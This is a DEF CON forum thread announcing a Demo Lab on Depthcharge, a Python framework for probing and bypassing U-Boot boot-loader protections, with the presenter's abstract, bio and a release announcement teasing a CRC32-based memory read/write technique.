DEF CON Forum Site Header Art
DEF CON Forum Site Header Art


No announcement yet.

About the Demo

  • Filter
  • Time
  • Show
Clear All
new posts

  • About the Demo

    Title: Depthcharge: A Framework for U-Boot Hacking

    Discord Channel: #dl-depthcharge

    Location: In-person Demolab 2

    When: Sat 10:00 – 11:50

    Presenter(s): Jon Szymaniak

    Abstract: In modern embedded systems that implement a “secure boot” flow, the boot loader plays a critical role in establishing the integrity and authenticity of software and data required to boot an operating system. Given the role and vantage point of boot loaders, they are a particularly interesting target for hardware hackers seeking to root a device and instrument it for further vulnerability hunting and reverse engineering. Although the vast majority of devices leveraging the ubiquitous and open source U-Boot boot loader leave it unprotected and trivially exploited, more product vendors are finally implementing secure boot and (attempting to) lock down their U-Boot builds. These less common specimen offer exciting opportunities to pursue creative bypasses and explore underappreciated U-Boot functionality. The Depthcharge framework was developed to help hardware hackers methodically (ab)use some of that underappreciated U-Boot functionality in novel ways to circumvent boot-time protections, as well as expedite the identification and exploitation of “the usual suspects” within exposed U-Boot device consoles. The project includes a Python 3 library for interfacing with devices, reading and writing memory via available primitives, deploying executable payloads, and analyzing various data structures. A collection of scripts built atop of library make this functionality readily available via the command line, and “Depthcharge Companion” firmware allows the tooling to extend its vantage point by presenting itself as a peripheral device connected to the target. This Demo Lab will introduce the basics of Depthcharge and explore how attendees can leverage and expand upon it when seeking to circumvent boot-time protections or just to further explore a system from within the U-Boot environment. For those wishing to protect their (employer’s) products from fellow DEF CON attendees, we’ll also cover the configuration checker functionality that can be used to avoid common U-Boot pitfalls.

    Audience: Hardware / Embedded Systems - Both “offense” and “defense” within this audience

    Links: GitHub: Documentation:

    Bio(s): Jon Szymaniak is Principle Security Consultant in NCC Group’s Hardware & Embedded Systems Services team and a former embedded systems engineer. His areas of interest include U-Boot, Linux, Yocto, and firmware reverse engineering. Through both his day job and hobby hacking adventures, he’s enjoyed exploring and exploiting boot ROMs, automotive ECUs, Android-based platforms, and a myriad of Internet-connected things that shouldn't be.

  • #2
    Release 0.3.0 is now available on GitHub and PyPi:

    Teaser gif below - How can we leverage U-Boot's CRC32 command as an arbitrary memory read/write primitive? Come find out how during the session!

    Afterwards, I'll plan to check in here and on Discord if folks have any devices they want to hack on, are running into any issues with Depthcharge, or just want to get started contributing to the project. (You can probably find me floating around hardware/iot/car hacking villages.)

    Oh, and obviously most importantly - I'll have free stickers.

    - Jon (jynik / @sz_jynik)

    Using U-Boots CRC32 as an arbitrary memory read/write primitve. Locate and modify hard-coded kernel command-line arguments in pruned down console environment.